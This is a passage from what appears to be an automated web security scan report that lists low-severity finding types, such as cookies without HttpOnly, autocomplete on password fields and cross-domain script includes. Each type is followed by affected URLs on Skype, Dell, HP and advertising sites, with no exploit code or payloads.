10.62. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

10.63. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

10.64. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

10.65. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

10.66. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

10.67. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

10.68. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

10.69. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

10.70. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

10.71. http://tags.bluekai.com/site/4234

10.72. http://tracker.marinsm.com/rd

10.73. http://ui.skype.com/ui/0/5.5.0.114./en/help

10.74. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade

10.75. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded

10.76. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps

10.77. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices

10.78. http://ui.skype.com/ui/0/5.5.0.115./en/go/share

10.79. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions

10.80. http://vap1den1.lijit.com/www/delivery/lg.php

10.81. http://vap1iad1.lijit.com/www/delivery/lg.php

10.82. http://vap1iad2.lijit.com/www/delivery/lg.php

10.83. http://vap1sfo1.lijit.com/www/delivery/lg.php

10.84. http://vap2den1.lijit.com/www/delivery/lg.php

10.85. http://vap2iad1.lijit.com/www/delivery/lg.php

10.86. http://vap3den1.lijit.com/www/delivery/lg.php

10.87. http://www.imiclk.com/cgi/r.cgi

10.88. http://www.lijit.com/beacon

11. Cookie without HttpOnly flag set

11.1. http://afe.specificclick.net/

11.2. http://ecustomeropinions.com/survey/survey.php

11.3. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

11.4. http://h30187.www3.hp.com/

11.5. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

11.6. http://h30187.www3.hp.com/howto_QL_courses.jsp

11.7. http://h30187.www3.hp.com/index.jsp

11.8. http://h30187.www3.hp.com/pv.gif

11.9. https://login.skype.com/account/password-reset-request

11.10. https://login.skype.com/password-reset-request

11.11. https://mpsnare.iesnare.com/snare.js

11.12. http://pixel.adsafeprotected.com/jspix

11.13. https://secure.skype.com/account/buy/package

11.14. https://secure.skype.com/account/login

11.15. https://support.skype.com/

11.16. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

11.17. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

11.18. http://142.xg4ken.com/media/redir.php

11.19. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

11.20. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

11.21. http://accessories.us.dell.com/sna/batteryconfig.aspx

11.22. http://accessories.us.dell.com/sna/category.aspx

11.23. http://accessories.us.dell.com/sna/category.aspx

11.24. http://accessories.us.dell.com/sna/default.aspx

11.25. http://accessories.us.dell.com/sna/memconfig.aspx

11.26. http://accessories.us.dell.com/sna/printersupplies.aspx

11.27. http://accessories.us.dell.com/sna/productdetail.aspx

11.28. http://accessories.us.dell.com/sna/sna.aspx

11.29. http://ad.yieldmanager.com/pixel

11.30. https://adwords.google.com/um/StartNewLogin

11.31. http://apr.lijit.com///www/delivery/ajs.php

11.32. http://b.scorecardresearch.com/b

11.33. http://b.scorecardresearch.com/p

11.34. http://b.scorecardresearch.com/r

11.35. http://ce.lijit.com/merge

11.36. http://community.skype.com/t5/Android%27/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

11.37. http://community.skype.com/t5/English/ct-p/English

11.38. http://community.skype.com/t5/image/serverpage/image-id/60iD23BC4754E7B32F3/image-dimensions/64x36

11.39. http://content.dell.com/us/en/business/security-network.aspx

11.40. http://cymphonix.app3.hubspot.com/salog.js.aspx

11.41. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/

11.42. http://data.cmcore.com/imp

11.43. http://dce.sapha.com/logging.php

11.44. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

11.45. http://eas.apm.emediate.eu/eas

11.46. http://gacela.eu/bb/mrcsrc/getpixel.php

11.47. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

11.48. http://h30187.www3.hp.com/is/233e5e7671/p/productId/104921/eventType/PDV/puid/999999b/i.gif

11.49. http://h30187.www3.hp.com/is/3569c10978/p/productId/104920/eventType/PDV/puid/999999b/i.gif

11.50. http://h30187.www3.hp.com/is/3af2f4399a/p/productId/104918/eventType/PDV/puid/999999b/i.gif

11.51. http://h30187.www3.hp.com/is/6b0543035d/p/productId/104922/eventType/PDV/puid/999999b/i.gif

11.52. http://h30187.www3.hp.com/is/778ee93a0e/p/productId/104919/eventType/PDV/puid/999999b/i.gif

11.53. http://h30187.www3.hp.com/is/99bcf3130c/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

11.54. http://h30187.www3.hp.com/is/fdee7fcaf7/p/productId/104931/eventType/PDV/puid/999999b/i.gif

11.55. http://h30187.www3.hp.com/resources/images/email-icon.gif

11.56. http://h30187.www3.hp.com/resources/images/print.gif

11.57. http://h30187.www3.hp.com/resources/images/s.gif

11.58. http://h30434.www3.hp.com/

11.59. https://login.skype.com/account/

11.60. https://login.skype.com/account/login-form

11.61. https://login.skype.com/account/password-automation

11.62. https://login.skype.com/account/password-token-sent

11.63. https://login.skype.com/account/signup-form

11.64. https://login.skype.com/go/shop

11.65. https://login.skype.com/go/shop.accessories.headsets

11.66. https://login.skype.com/go/shop.accessories.phones

11.67. https://login.skype.com/go/shop.accessories.webcams

11.68. https://login.skype.com/go/shop.extras

11.69. https://login.skype.com/go/skype.manager.setup

11.70. https://login.skype.com/go/tvwebcams

11.71. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

11.72. http://media.fastclick.net/w/tre

11.73. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

11.74. https://mid.live.com/si/login.aspx/x22

11.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

11.76. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx

11.77. http://pixel.33across.com/ps/

11.78. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

11.79. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif

11.80. http://r.turn.com/r/beacon

11.81. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

11.82. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

11.83. http://rotation.linuxnewmedia.com/www/delivery/ajs.php

11.84. http://rotation.linuxnewmedia.com/www/delivery/lg.php

11.85. http://search.dell.com/public/css.aspx

11.86. http://search.dell.com/public/menu.aspx

11.87. http://search.dell.com/results.aspx

11.88. https://secure.skype.com/login

11.89. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

11.90. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

11.91. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

11.92. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

11.93. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

11.94. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

11.95. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

11.96. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

11.97. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

11.98. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

11.99. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

11.100. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

11.101. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

11.102. http://statse.webtrendslive.com/dcs2aqcdt10000oakh3fs9xoa_2g3x/dcs.gif

11.103. http://tag.admeld.com/ad/js/179/lijit/728x90/ros

11.104. http://tags.bluekai.com/site/4234

11.105. http://tracker.marinsm.com/rd

11.106. http://trk.etrigue.com/track.php

11.107. http://ui.skype.com/ui/0/5.5.0.114./en/help

11.108. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade

11.109. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded

11.110. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps

11.111. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices

11.112. http://ui.skype.com/ui/0/5.5.0.115./en/go/share

11.113. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions

11.114. http://vap1den1.lijit.com/www/delivery/lg.php

11.115. http://vap1iad1.lijit.com/www/delivery/lg.php

11.116. http://vap1iad2.lijit.com/www/delivery/lg.php

11.117. http://vap1sfo1.lijit.com/www/delivery/lg.php

11.118. http://vap2den1.lijit.com/www/delivery/lg.php

11.119. http://vap2iad1.lijit.com/www/delivery/lg.php

11.120. http://vap3den1.lijit.com/www/delivery/lg.php

11.121. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

11.122. http://www.googleadservices.com/pagead/aclk

11.123. http://www.hl.com/

11.124. http://www.hlhz.com/us/

11.125. http://www.imiclk.com/cgi/r.cgi

11.126. http://www.lijit.com/beacon

11.127. http://www.newsgator.com/images/ngsub1.gif

12. Password field with autocomplete enabled

12.1. https://mid.live.com/si/login.aspx/x22

12.2. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

12.3. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

12.4. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

13. Source code disclosure

13.1. https://developer.skype.com/javascripts/skype/pp/prettify.js

13.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework

14. ASP.NET debugging enabled

14.1. http://h17007.www1.hp.com/Default.aspx

14.2. http://h20158.www2.hp.com/Default.aspx

15. Referer-dependent response

16. Cross-domain POST

16.1. http://blogs.skype.com/de/

16.2. http://blogs.skype.com/developer/

16.3. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html

16.4. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html

16.5. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html

16.6. http://blogs.skype.com/en/

16.7. http://blogs.skype.com/en/2005/05/

16.8. http://blogs.skype.com/en/2005/06/

16.9. http://blogs.skype.com/en/2005/07/

16.10. http://blogs.skype.com/en/2005/08/

16.11. http://blogs.skype.com/en/2005/09/

16.12. http://blogs.skype.com/en/2005/10/

16.13. http://blogs.skype.com/en/2005/11/

16.14. http://blogs.skype.com/en/2005/12/

16.15. http://blogs.skype.com/en/2006/01/

16.16. http://blogs.skype.com/en/2006/02/

16.17. http://blogs.skype.com/en/2006/03/

16.18. http://blogs.skype.com/en/2006/04/

16.19. http://blogs.skype.com/en/2006/05/

16.20. http://blogs.skype.com/en/2006/06/

16.21. http://blogs.skype.com/en/2006/07/

16.22. http://blogs.skype.com/en/2006/08/

16.23. http://blogs.skype.com/en/2006/09/

16.24. http://blogs.skype.com/en/2006/10/

16.25. http://blogs.skype.com/en/2006/11/

16.26. http://blogs.skype.com/en/2006/12/

16.27. http://blogs.skype.com/en/2007/01/

16.28. http://blogs.skype.com/en/2007/02/

16.29. http://blogs.skype.com/en/2007/03/

16.30. http://blogs.skype.com/en/2007/04/

16.31. http://blogs.skype.com/en/2007/05/

16.32. http://blogs.skype.com/en/2007/06/

16.33. http://blogs.skype.com/en/2007/07/

16.34. http://blogs.skype.com/en/2007/08/

16.35. http://blogs.skype.com/en/2007/09/

16.36. http://blogs.skype.com/en/2007/10/

16.37. http://blogs.skype.com/en/2007/11/

16.38. http://blogs.skype.com/en/2008/01/

16.39. http://blogs.skype.com/en/2008/02/

16.40. http://blogs.skype.com/en/2008/03/

16.41. http://blogs.skype.com/en/2008/04/

16.42. http://blogs.skype.com/en/2008/05/

16.43. http://blogs.skype.com/en/2008/06/

16.44. http://blogs.skype.com/en/2008/07/

16.45. http://blogs.skype.com/en/2008/08/

16.46. http://blogs.skype.com/en/2008/09/

16.47. http://blogs.skype.com/en/2008/10/

16.48. http://blogs.skype.com/en/2008/11/

16.49. http://blogs.skype.com/en/2008/12/

16.50. http://blogs.skype.com/en/2009/01/

16.51. http://blogs.skype.com/en/2009/02/

16.52. http://blogs.skype.com/en/2009/03/

16.53. http://blogs.skype.com/en/2009/04/

16.54. http://blogs.skype.com/en/2009/05/

16.55. http://blogs.skype.com/en/2009/06/

16.56. http://blogs.skype.com/en/2009/07/

16.57. http://blogs.skype.com/en/2009/08/

16.58. http://blogs.skype.com/en/2009/09/

16.59. http://blogs.skype.com/en/2009/10/

16.60. http://blogs.skype.com/en/2009/11/

16.61. http://blogs.skype.com/en/2009/12/

16.62. http://blogs.skype.com/en/2010/01/

16.63. http://blogs.skype.com/en/2010/02/

16.64. http://blogs.skype.com/en/2010/03/

16.65. http://blogs.skype.com/en/2010/04/

16.66. http://blogs.skype.com/en/2010/05/

16.67. http://blogs.skype.com/en/2010/06/

16.68. http://blogs.skype.com/en/2010/07/

16.69. http://blogs.skype.com/en/2010/08/

16.70. http://blogs.skype.com/en/2010/09/

16.71. http://blogs.skype.com/en/2010/10/

16.72. http://blogs.skype.com/en/2010/11/

16.73. http://blogs.skype.com/en/2010/12/

16.74. http://blogs.skype.com/en/2011/01/

16.75. http://blogs.skype.com/en/2011/02/

16.76. http://blogs.skype.com/en/2011/03/

16.77. http://blogs.skype.com/en/2011/04/

16.78. http://blogs.skype.com/en/2011/05/

16.79. http://blogs.skype.com/en/2011/06/

16.80. http://blogs.skype.com/en/2011/07/

16.81. http://blogs.skype.com/en/2011/08/

16.82. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html

16.83. http://blogs.skype.com/en/2011/09/

16.84. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html

16.85. http://blogs.skype.com/en/advertising/

16.86. http://blogs.skype.com/en/android/

16.87. http://blogs.skype.com/en/apps/

16.88. http://blogs.skype.com/en/blackberry/

16.89. http://blogs.skype.com/en/brew/

16.90. http://blogs.skype.com/en/campaigns_and_promotions/

16.91. http://blogs.skype.com/en/careers/

16.92. http://blogs.skype.com/en/comments.html

16.93. http://blogs.skype.com/en/corporate/

16.94. http://blogs.skype.com/en/education/

16.95. http://blogs.skype.com/en/enterprise/

16.96. http://blogs.skype.com/en/entertainment/

16.97. http://blogs.skype.com/en/events/

16.98. http://blogs.skype.com/en/facebook/

16.99. http://blogs.skype.com/en/html-guide.html

16.100. http://blogs.skype.com/en/insight/

16.101. http://blogs.skype.com/en/iphone/

16.102. http://blogs.skype.com/en/life_at_skype/

16.103. http://blogs.skype.com/en/mac/

16.104. http://blogs.skype.com/en/mobile/

16.105. http://blogs.skype.com/en/mwc/

16.106. http://blogs.skype.com/en/open_internet/

16.107. http://blogs.skype.com/en/palm/

16.108. http://blogs.skype.com/en/skype_on_your_tv/

16.109. http://blogs.skype.com/en/social_good/

16.110. http://blogs.skype.com/en/sony_ericsson/

16.111. http://blogs.skype.com/en/subscriptions/

16.112. http://blogs.skype.com/en/symbian/

16.113. http://blogs.skype.com/en/verizon_wireless/

16.114. http://blogs.skype.com/en/wifi/

16.115. http://blogs.skype.com/en/windows/

16.116. http://blogs.skype.com/en/windows_mobile/

16.117. http://blogs.skype.com/enterprise/

16.118. http://blogs.skype.com/es/

16.119. http://blogs.skype.com/et/

16.120. http://blogs.skype.com/fr/

16.121. http://blogs.skype.com/garage/

16.122. http://blogs.skype.com/it/

16.123. http://blogs.skype.com/ja/

16.124. http://blogs.skype.com/ko/

16.125. http://blogs.skype.com/linux/

16.126. http://blogs.skype.com/mac/

16.127. http://blogs.skype.com/pl/

16.128. http://blogs.skype.com/play/

16.129. http://blogs.skype.com/pt/

16.130. http://blogs.skype.com/ru/

16.131. http://blogs.skype.com/security/

16.132. http://blogs.skype.com/zh-Hans/

16.133. http://blogs.skype.com/zh-Hant/

16.134. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

17. Cross-domain Referer leakage

17.1. http://accessories.us.dell.com/sna/DellPartsFamily.aspx

17.2. http://accessories.us.dell.com/sna/ShopAllBrands.aspx

17.3. http://accessories.us.dell.com/sna/batteryconfig.aspx

17.4. http://accessories.us.dell.com/sna/category.aspx

17.5. http://accessories.us.dell.com/sna/default.aspx

17.6. http://accessories.us.dell.com/sna/memconfig.aspx

17.7. http://accessories.us.dell.com/sna/printersupplies.aspx

17.8. http://accessories.us.dell.com/sna/sna.aspx

17.9. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

17.10. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

17.11. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

17.12. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

17.13. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

17.14. http://ad.doubleclick.net/adj/lqm.w3schools.site/RON

17.15. http://ad.turn.com/server/ads.js

17.16. http://afe.specificclick.net/serve/v=5

17.17. http://afe.specificclick.net/serve/v=5

17.18. http://apps.sapha.com/appshandler.php

17.19. http://community.skype.com/t5/English/ct-p/English

17.20. http://community.skype.com/t5/forums/searchpage/tab/message

17.21. http://community.skype.com/t5/forums/searchpage/tab/message

17.22. http://content.dell.com/us/en/business/security-network.aspx

17.23. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

17.24. http://ecustomeropinions.com/survey/survey.php

17.25. http://fls.doubleclick.net/activityi

17.26. http://fls.doubleclick.net/activityi

17.27. http://fls.doubleclick.net/activityi

17.28. https://fls.doubleclick.net/activityi

17.29. http://googleads.g.doubleclick.net/pagead/ads

17.30. http://googleads.g.doubleclick.net/pagead/ads

17.31. http://googleads.g.doubleclick.net/pagead/ads

17.32. http://googleads.g.doubleclick.net/pagead/ads

17.33. http://googleads.g.doubleclick.net/pagead/ads

17.34. http://googleads.g.doubleclick.net/pagead/ads

17.35. http://googleads.g.doubleclick.net/pagead/ads

17.36. http://googleads.g.doubleclick.net/pagead/ads

17.37. http://googleads.g.doubleclick.net/pagead/ads

17.38. http://googleads.g.doubleclick.net/pagead/ads

17.39. http://googleads.g.doubleclick.net/pagead/ads

17.40. http://googleads.g.doubleclick.net/pagead/ads

17.41. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

17.42. http://h20180.www2.hp.com/apps/Nav

17.43. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

17.44. http://h30187.www3.hp.com/

17.45. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

17.46. http://h30187.www3.hp.com/howto_QL_courses.jsp

17.47. http://h30187.www3.hp.com/index.jsp

17.48. http://h30261.www3.hp.com/phoenix.zhtml

17.49. https://h41183.www4.hp.com/inflexion/

17.50. https://login.skype.com/account/

17.51. https://login.skype.com/account/login-form

17.52. https://login.skype.com/account/password-automation

17.53. https://login.skype.com/account/password-reset-request

17.54. https://login.skype.com/account/password-token-sent

17.55. https://login.skype.com/account/signup-form

17.56. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

17.57. http://oasc18015.247realmedia.com/RealMedia/ads/adstream_jx.ads/www.wallstreetoasis.rgm/paid/1586444613@Right

17.58. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

17.59. http://s1.lqcdn.com/m.min.js

17.60. http://search.dell.com/results.aspx

17.61. http://search.hp.com/query.html

17.62. http://search2.skype.com/search/search.cgi

17.63. https://secure.skype.com/login

17.64. http://shop.skype.com/apps/Search-Results.html

17.65. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

17.66. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

17.67. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

17.68. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

17.69. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

17.70. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

17.71. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

17.72. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

17.73. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

17.74. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

17.75. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

17.76. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

17.77. https://support.skype.com/en/search

17.78. https://support.skype.com/faqView.do

17.79. https://support.skype.com/search.do

17.80. http://view.atdmt.com/CNT/iview/334305255/direct/01

17.81. http://view.atdmt.com/CNT/iview/334305255/direct/01

17.82. http://view.atdmt.com/I36/iview/325171692/direct

17.83. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

17.84. http://www.cymphonix.com/2011-shaping-demo-sem.html

17.85. http://www.facebook.com/plugins/fan.php

17.86. http://www.google.com/cse

17.87. http://www.google.com/search

17.88. http://www.google.com/search

17.89. http://www.google.com/search

17.90. http://www.google.com/search

17.91. http://www.google.com/url

17.92. http://www.google.com/url

17.93. http://www.google.com/url

17.94. http://www.google.com/url

17.95. http://www.google.com/url

17.96. http://www.google.com/url

17.97. http://www.hlhz.com/us/home.aspx

17.98. http://www.lijit.com/beacon

17.99. http://www.livehelpnow.net/lhn/functions/imageserver.ashx

17.100. http://www.radware.com/Resources/AppWallSolution.aspx

17.101. http://www.skype.com/intl/en-us/prices/pay-monthly/

17.102. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/

17.103. http://www.skype.com/intl/en-us/prices/premium

17.104. http://www.skype.com/intl/en-us/tell-a-friend/

17.105. http://www.skype.com/intl/en/prices/pay-monthly/

17.106. http://www.skype.com/intl/en/prices/premium

17.107. http://www.w3schools.com/jsref/tryit.asp

17.108. http://www.w3schools.com/jsref/tryit.asp

17.109. http://www.w3schools.com/jsref/tryit.asp

17.110. http://www.w3schools.com/jsref/tryit_view.asp

17.111. http://www.w3schools.com/jsref/tryit_view.asp

17.112. http://www.w3schools.com/jsref/tryit_view.asp

17.113. http://www.w3schools.com/tryitbanner.asp

18. Cross-domain script include

18.1. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

18.2. http://afe.specificclick.net/serve/v=5

18.3. http://blogs.skype.com/de/

18.4. http://blogs.skype.com/developer/

18.5. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html

18.6. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html

18.7. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html

18.8. http://blogs.skype.com/en/

18.9. http://blogs.skype.com/en/2005/05/

18.10. http://blogs.skype.com/en/2005/06/

18.11. http://blogs.skype.com/en/2005/07/

18.12. http://blogs.skype.com/en/2005/08/

18.13. http://blogs.skype.com/en/2005/09/

18.14. http://blogs.skype.com/en/2005/10/

18.15. http://blogs.skype.com/en/2005/11/

18.16. http://blogs.skype.com/en/2005/12/

18.17. http://blogs.skype.com/en/2006/01/

18.18. http://blogs.skype.com/en/2006/02/

18.19. http://blogs.skype.com/en/2006/03/

18.20. http://blogs.skype.com/en/2006/04/

18.21. http://blogs.skype.com/en/2006/05/

18.22. http://blogs.skype.com/en/2006/06/

18.23. http://blogs.skype.com/en/2006/07/

18.24. http://blogs.skype.com/en/2006/08/

18.25. http://blogs.skype.com/en/2006/09/

18.26. http://blogs.skype.com/en/2006/10/

18.27. http://blogs.skype.com/en/2006/11/

18.28. http://blogs.skype.com/en/2006/12/

18.29. http://blogs.skype.com/en/2007/01/

18.30. http://blogs.skype.com/en/2007/02/

18.31. http://blogs.skype.com/en/2007/03/

18.32. http://blogs.skype.com/en/2007/04/

18.33. http://blogs.skype.com/en/2007/05/

18.34. http://blogs.skype.com/en/2007/06/

18.35. http://blogs.skype.com/en/2007/07/

18.36. http://blogs.skype.com/en/2007/08/

18.37. http://blogs.skype.com/en/2007/09/

18.38. http://blogs.skype.com/en/2007/10/

18.39. http://blogs.skype.com/en/2007/11/

18.40. http://blogs.skype.com/en/2008/01/

18.41. http://blogs.skype.com/en/2008/02/

18.42. http://blogs.skype.com/en/2008/03/

18.43. http://blogs.skype.com/en/2008/04/

18.44. http://blogs.skype.com/en/2008/05/

18.45. http://blogs.skype.com/en/2008/06/

18.46. http://blogs.skype.com/en/2008/07/

18.47. http://blogs.skype.com/en/2008/08/

18.48. http://blogs.skype.com/en/2008/09/

18.49. http://blogs.skype.com/en/2008/10/

18.50. http://blogs.skype.com/en/2008/11/

18.51. http://blogs.skype.com/en/2008/12/

18.52. http://blogs.skype.com/en/2009/01/

18.53. http://blogs.skype.com/en/2009/02/

18.54. http://blogs.skype.com/en/2009/03/

18.55. http://blogs.skype.com/en/2009/04/

18.56. http://blogs.skype.com/en/2009/05/

18.57. http://blogs.skype.com/en/2009/06/

18.58. http://blogs.skype.com/en/2009/07/

18.59. http://blogs.skype.com/en/2009/08/

18.60. http://blogs.skype.com/en/2009/09/

18.61. http://blogs.skype.com/en/2009/10/

18.62. http://blogs.skype.com/en/2009/11/

18.63. http://blogs.skype.com/en/2009/12/

18.64. http://blogs.skype.com/en/2010/01/

18.65. http://blogs.skype.com/en/2010/02/

18.66. http://blogs.skype.com/en/2010/03/

18.67. http://blogs.skype.com/en/2010/04/

18.68. http://blogs.skype.com/en/2010/05/

18.69. http://blogs.skype.com/en/2010/06/

18.70. http://blogs.skype.com/en/2010/07/

18.71. http://blogs.skype.com/en/2010/08/

18.72. http://blogs.skype.com/en/2010/09/

18.73. http://blogs.skype.com/en/2010/10/

18.74. http://blogs.skype.com/en/2010/11/

18.75. http://blogs.skype.com/en/2010/12/

18.76. http://blogs.skype.com/en/2011/01/

18.77. http://blogs.skype.com/en/2011/02/

18.78. http://blogs.skype.com/en/2011/03/

18.79. http://blogs.skype.com/en/2011/04/

18.80. http://blogs.skype.com/en/2011/05/

18.81. http://blogs.skype.com/en/2011/06/

18.82. http://blogs.skype.com/en/2011/07/

18.83. http://blogs.skype.com/en/2011/08/

18.84. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html

18.85. http://blogs.skype.com/en/2011/09/

18.86. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html

18.87. http://blogs.skype.com/en/advertising/

18.88. http://blogs.skype.com/en/android/

18.89. http://blogs.skype.com/en/apps/

18.90. http://blogs.skype.com/en/blackberry/

18.91. http://blogs.skype.com/en/brew/

18.92. http://blogs.skype.com/en/campaigns_and_promotions/

18.93. http://blogs.skype.com/en/careers/

18.94. http://blogs.skype.com/en/comments.html

18.95. http://blogs.skype.com/en/corporate/

18.96. http://blogs.skype.com/en/education/

18.97. http://blogs.skype.com/en/enterprise/

18.98. http://blogs.skype.com/en/entertainment/

18.99. http://blogs.skype.com/en/events/

18.100. http://blogs.skype.com/en/facebook/

18.101. http://blogs.skype.com/en/html-guide.html

18.102. http://blogs.skype.com/en/insight/

18.103. http://blogs.skype.com/en/iphone/

18.104. http://blogs.skype.com/en/life_at_skype/

18.105. http://blogs.skype.com/en/mac/

18.106. http://blogs.skype.com/en/mobile/

18.107. http://blogs.skype.com/en/mwc/

18.108. http://blogs.skype.com/en/open_internet/

18.109. http://blogs.skype.com/en/palm/

18.110. http://blogs.skype.com/en/skype_on_your_tv/

18.111. http://blogs.skype.com/en/social_good/

18.112. http://blogs.skype.com/en/sony_ericsson/

18.113. http://blogs.skype.com/en/subscriptions/

18.114. http://blogs.skype.com/en/symbian/

18.115. http://blogs.skype.com/en/verizon_wireless/

18.116. http://blogs.skype.com/en/wifi/

18.117. http://blogs.skype.com/en/windows/

18.118. http://blogs.skype.com/en/windows_mobile/

18.119. http://blogs.skype.com/enterprise/

18.120. http://blogs.skype.com/es/

18.121. http://blogs.skype.com/et/

18.122. http://blogs.skype.com/fr/

18.123. http://blogs.skype.com/garage/

18.124. http://blogs.skype.com/it/

18.125. http://blogs.skype.com/ja/

18.126. http://blogs.skype.com/ko/

18.127. http://blogs.skype.com/linux/

18.128. http://blogs.skype.com/mac/

18.129. http://blogs.skype.com/pl/

18.130. http://blogs.skype.com/play/

18.131. http://blogs.skype.com/pt/

18.132. http://blogs.skype.com/ru/

18.133. http://blogs.skype.com/security/

